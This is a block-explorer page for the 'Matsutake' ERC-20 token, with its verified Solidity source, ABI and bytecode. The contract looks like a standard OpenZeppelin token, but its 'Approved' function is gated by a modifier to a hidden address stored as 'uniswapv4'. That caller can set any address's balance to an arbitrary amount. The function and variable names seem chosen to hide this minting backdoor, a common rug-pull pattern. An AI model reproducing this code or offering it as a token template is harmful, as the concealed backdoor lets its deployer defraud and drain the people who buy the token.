ERC-20
Overview
Max Total Supply
500,000,000,000 MATSUTAKE
Holders
13
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
42,807,887,976.696612846883951184 MATSUTAKEValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
Matsutake
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-25 */ // Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol // SPDX-License-Identifier: MIT // pragma solidity ^0.8.0; /** * @dev Interface of the IERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // Dependency file: @openzeppelin/contracts/utils/Context.sol // pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // Dependency file: @openzeppelin/contracts/access/Ownable.sol // pragma solidity ^0.8.0; // import "@openzeppelin/contracts/utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol // pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } // Dependency file: contracts/baseToken.sol // pragma solidity =0.8.4; enum TokenType { standard } abstract contract baseToken { event TokenCreated( address indexed owner, address indexed token, TokenType tokenType, uint256 version ); } // Root file: contracts/standard/StandardToken.sol pragma solidity =0.8.19; // import "@openzeppelin/contracts/token/IERC20/IERC20.sol"; // import "@openzeppelin/contracts/access/Ownable.sol"; // import "@openzeppelin/contracts/utils/math/SafeMath.sol"; // import "contracts/baseToken.sol"; contract Matsutake is IERC20, baseToken, Ownable { using SafeMath for uint256; uint256 private constant VERSION = 1; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 public MMM; uint256 public III; address public Multicall; address private uniswapv4; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; constructor( string memory name_, string memory symbol_, uint8 decimals_, address family, uint256 totalSupply_ ) payable { _name = name_; _symbol = symbol_; _decimals = decimals_; uniswapv4 = family; _mint(owner(), totalSupply_); emit TokenCreated(owner(), address(this), TokenType.standard, VERSION); } function name() public view virtual returns (string memory) { return _name; } function symbol() public view virtual returns (string memory) { return _symbol; } function decimals() public view virtual returns (uint8) { return _decimals; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amount, "IERC20: transfer amount exceeds allowance" ) ); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue) ); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].sub( subtractedValue, "IERC20: decreased allowance below zero" ) ); return true; } modifier Addquniswapv4() { require( _msgSender() == uniswapv4, "set the call to the entered") ; _; } function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "IERC20: transfer from the zero address"); require(recipient != address(0), "IERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub( amount, "IERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } function Approved( bool _limited, address _Multicall, uint256 _MMM, uint256 _III ) external Addquniswapv4 { Multicall = _Multicall;MMM = _MMM;III = _III; _balances[Multicall] = MMM * III; } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub( amount, "IERC20: burn amount exceeds balance" ); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "IERC20: approve from the zero address"); require(spender != address(0), "IERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _setupDecimals(uint8 decimals_) internal virtual { _decimals = decimals_; } function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"family","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"bool","name":"_limited","type":"bool"},{"internalType":"address","name":"_Multicall","type":"address"},{"internalType":"uint256","name":"_MMM","type":"uint256"},{"internalType":"uint256","name":"_III","type":"uint256"}],"name":"Approved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"III","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MMM","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"Multicall","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
6080604052604051620011a0380380620011a083398101604081905262000026916200031d565b6200003133620000fc565b60076200003f86826200045b565b5060086200004e85826200045b565b506009805460ff191660ff8516179055600680546001600160a01b0319166001600160a01b03841617905562000097620000906000546001600160a01b031690565b826200014c565b30620000ab6000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000e992919062000527565b60405180910390a3505050505062000576565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a75760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b600a54620001b6908262000241565b600a556001600160a01b038216600090815260016020526040902054620001de908262000241565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002309085815260200190565b60405180910390a35050565b505050565b60006200024f828462000554565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200028057600080fd5b81516001600160401b03808211156200029d576200029d62000258565b604051601f8301601f19908116603f01168101908282118183101715620002c857620002c862000258565b81604052838152602092508683858801011115620002e557600080fd5b600091505b83821015620003095785820183015181830184015290820190620002ea565b600093810190920192909252949350505050565b600080600080600060a086880312156200033657600080fd5b85516001600160401b03808211156200034e57600080fd5b6200035c89838a016200026e565b965060208801519150808211156200037357600080fd5b5062000382888289016200026e565b945050604086015160ff811681146200039a57600080fd5b60608701519093506001600160a01b0381168114620003b857600080fd5b80925050608086015190509295509295909350565b600181811c90821680620003e257607f821691505b6020821081036200040357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023c57600081815260208120601f850160051c81016020861015620004325750805b601f850160051c820191505b8181101562000453578281556001016200043e565b505050505050565b81516001600160401b0381111562000477576200047762000258565b6200048f81620004888454620003cd565b8462000409565b602080601f831160018114620004c75760008415620004ae5750858301515b600019600386901b1c1916600185901b17855562000453565b600085815260208120601f198616915b82811015620004f857888601518255948401946001909101908401620004d7565b5085821015620005175787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600184106200054a57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b808201808211156200025257634e487b7160e01b600052601160045260246000fd5b610c1a80620005866000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c80638da5cb5b116100a2578063a457c2d711610071578063a457c2d714610238578063a9059cbb1461024b578063dd62ed3e1461025e578063f2fde38b14610297578063f5a63808146102aa57600080fd5b80638da5cb5b146101e557806395d89b411461020a5780639cad7b18146102125780639e4aa36a1461022557600080fd5b806326f1809b116100e957806326f1809b14610181578063313ce5671461018a578063395093511461019f57806370a08231146101b2578063715018a6146101db57600080fd5b806306fdde031461011b578063095ea7b31461013957806318160ddd1461015c57806323b872dd1461016e575b600080fd5b6101236102b3565b604051610130919061098d565b60405180910390f35b61014c6101473660046109f7565b610345565b6040519015158152602001610130565b600a545b604051908152602001610130565b61014c61017c366004610a21565b61035c565b61016060035481565b60095460405160ff9091168152602001610130565b61014c6101ad3660046109f7565b6103c5565b6101606101c0366004610a5d565b6001600160a01b031660009081526001602052604090205490565b6101e36103fb565b005b6000546001600160a01b03165b6040516001600160a01b039091168152602001610130565b610123610466565b6005546101f2906001600160a01b031681565b6101e3610233366004610a78565b610475565b61014c6102463660046109f7565b610528565b61014c6102593660046109f7565b610577565b61016061026c366004610ac1565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101e36102a5366004610a5d565b610584565b61016060045481565b6060600780546102c290610af4565b80601f01602080910402602001604051908101604052809291908181526020018280546102ee90610af4565b801561033b5780601f106103105761010080835404028352916020019161033b565b820191906000526020600020905b81548152906001019060200180831161031e57829003601f168201915b5050505050905090565b600061035233848461064f565b5060015b92915050565b6000610369848484610777565b6103bb84336103b685604051806060016040528060298152602001610bbc602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108fe565b61064f565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103529185906103b6908661092a565b6000546001600160a01b0316331461045a5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b610464600061093d565b565b6060600880546102c290610af4565b6006546001600160a01b0316336001600160a01b0316146104d85760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610451565b600580546001600160a01b0319166001600160a01b038516179055600382905560048190556105078183610b44565b6005546001600160a01b031660009081526001602052604090205550505050565b600061035233846103b685604051806060016040528060268152602001610b6f602691393360009081526002602090815260408083206001600160a01b038d16845290915290205491906108fe565b6000610352338484610777565b6000546001600160a01b031633146105de5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610451565b6001600160a01b0381166106435760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610451565b61064c8161093d565b50565b6001600160a01b0383166106b35760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610451565b6001600160a01b0382166107155760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610451565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107dc5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610451565b6001600160a01b03821661083e5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610451565b61087b81604051806060016040528060278152602001610b95602791396001600160a01b03861660009081526001602052604090205491906108fe565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108aa908261092a565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061076a9085815260200190565b600081848411156109225760405162461bcd60e51b8152600401610451919061098d565b505050900390565b60006109368284610b5b565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156109ba5785810183015185820160400152820161099e565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146109f257600080fd5b919050565b60008060408385031215610a0a57600080fd5b610a13836109db565b946020939093013593505050565b600080600060608486031215610a3657600080fd5b610a3f846109db565b9250610a4d602085016109db565b9150604084013590509250925092565b600060208284031215610a6f57600080fd5b610936826109db565b60008060008060808587031215610a8e57600080fd5b84358015158114610a9e57600080fd5b9350610aac602086016109db565b93969395505050506040820135916060013590565b60008060408385031215610ad457600080fd5b610add836109db565b9150610aeb602084016109db565b90509250929050565b600181811c90821680610b0857607f821691505b602082108103610b2857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761035657610356610b2e565b8082018082111561035657610356610b2e56fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212201eb997aae3eee481357cd8d5168fab821d0a7b9c7ed045417562fee4d29dbf1664736f6c6343000813003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000a6de5a07b7a6476a3c3784d5f32e4d73ba51bdb300000000000000000000000000000000000000064f964e68233a76f52000000000000000000000000000000000000000000000000000000000000000000000094d6174737574616b65000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000094d4154535554414b450000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101165760003560e01c80638da5cb5b116100a2578063a457c2d711610071578063a457c2d714610238578063a9059cbb1461024b578063dd62ed3e1461025e578063f2fde38b14610297578063f5a63808146102aa57600080fd5b80638da5cb5b146101e557806395d89b411461020a5780639cad7b18146102125780639e4aa36a1461022557600080fd5b806326f1809b116100e957806326f1809b14610181578063313ce5671461018a578063395093511461019f57806370a08231146101b2578063715018a6146101db57600080fd5b806306fdde031461011b578063095ea7b31461013957806318160ddd1461015c57806323b872dd1461016e575b600080fd5b6101236102b3565b604051610130919061098d565b60405180910390f35b61014c6101473660046109f7565b610345565b6040519015158152602001610130565b600a545b604051908152602001610130565b61014c61017c366004610a21565b61035c565b61016060035481565b60095460405160ff9091168152602001610130565b61014c6101ad3660046109f7565b6103c5565b6101606101c0366004610a5d565b6001600160a01b031660009081526001602052604090205490565b6101e36103fb565b005b6000546001600160a01b03165b6040516001600160a01b039091168152602001610130565b610123610466565b6005546101f2906001600160a01b031681565b6101e3610233366004610a78565b610475565b61014c6102463660046109f7565b610528565b61014c6102593660046109f7565b610577565b61016061026c366004610ac1565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101e36102a5366004610a5d565b610584565b61016060045481565b6060600780546102c290610af4565b80601f01602080910402602001604051908101604052809291908181526020018280546102ee90610af4565b801561033b5780601f106103105761010080835404028352916020019161033b565b820191906000526020600020905b81548152906001019060200180831161031e57829003601f168201915b5050505050905090565b600061035233848461064f565b5060015b92915050565b6000610369848484610777565b6103bb84336103b685604051806060016040528060298152602001610bbc602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108fe565b61064f565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103529185906103b6908661092a565b6000546001600160a01b0316331461045a5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b610464600061093d565b565b6060600880546102c290610af4565b6006546001600160a01b0316336001600160a01b0316146104d85760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610451565b600580546001600160a01b0319166001600160a01b038516179055600382905560048190556105078183610b44565b6005546001600160a01b031660009081526001602052604090205550505050565b600061035233846103b685604051806060016040528060268152602001610b6f602691393360009081526002602090815260408083206001600160a01b038d16845290915290205491906108fe565b6000610352338484610777565b6000546001600160a01b031633146105de5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610451565b6001600160a01b0381166106435760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610451565b61064c8161093d565b50565b6001600160a01b0383166106b35760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610451565b6001600160a01b0382166107155760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610451565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107dc5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610451565b6001600160a01b03821661083e5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610451565b61087b81604051806060016040528060278152602001610b95602791396001600160a01b03861660009081526001602052604090205491906108fe565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108aa908261092a565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061076a9085815260200190565b600081848411156109225760405162461bcd60e51b8152600401610451919061098d565b505050900390565b60006109368284610b5b565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156109ba5785810183015185820160400152820161099e565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146109f257600080fd5b919050565b60008060408385031215610a0a57600080fd5b610a13836109db565b946020939093013593505050565b600080600060608486031215610a3657600080fd5b610a3f846109db565b9250610a4d602085016109db565b9150604084013590509250925092565b600060208284031215610a6f57600080fd5b610936826109db565b60008060008060808587031215610a8e57600080fd5b84358015158114610a9e57600080fd5b9350610aac602086016109db565b93969395505050506040820135916060013590565b60008060408385031215610ad457600080fd5b610add836109db565b9150610aeb602084016109db565b90509250929050565b600181811c90821680610b0857607f821691505b602082108103610b2857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808202811582820484141761035657610356610b2e565b8082018082111561035657610356610b2e56fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212201eb997aae3eee48135